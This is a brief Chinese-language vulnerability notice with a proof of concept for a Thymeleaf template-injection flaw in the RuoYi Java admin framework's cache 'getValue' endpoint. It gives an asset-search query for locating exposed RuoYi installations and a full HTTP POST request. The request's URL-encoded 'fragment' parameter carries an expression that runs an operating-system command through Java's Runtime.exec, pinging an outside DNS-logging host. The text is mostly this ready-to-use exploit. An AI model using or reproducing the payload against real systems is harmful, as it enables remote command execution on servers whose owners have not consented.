若依快速开发框架getValue存在thymeleaf 模板注入漏洞
一、漏洞简介
ruoyi是一套基于java开发的轻量级开源快速开发框架,采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计,代码清晰简单易于维护,同时提供多种组件,如代码生成、前后端分离、数据权限管理等,可以快速开发出完整的项目。若依快速开发框架getValue存在thymeleaf 模板注入漏洞
二、影响版本
- ruoyi
三、资产测绘
app="若依-管理系统"
四、漏洞复现
POST /monitor/cache/getValue HTTP/1.1
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host:
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
cacheName=1&fragment=%28%28%24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%71%75%71%6a%66%76%65%74%6d%74%2e%64%67%72%68%33%2e%63%6e%22%29%7d%29%29fragment后的内容为url编码后的代码
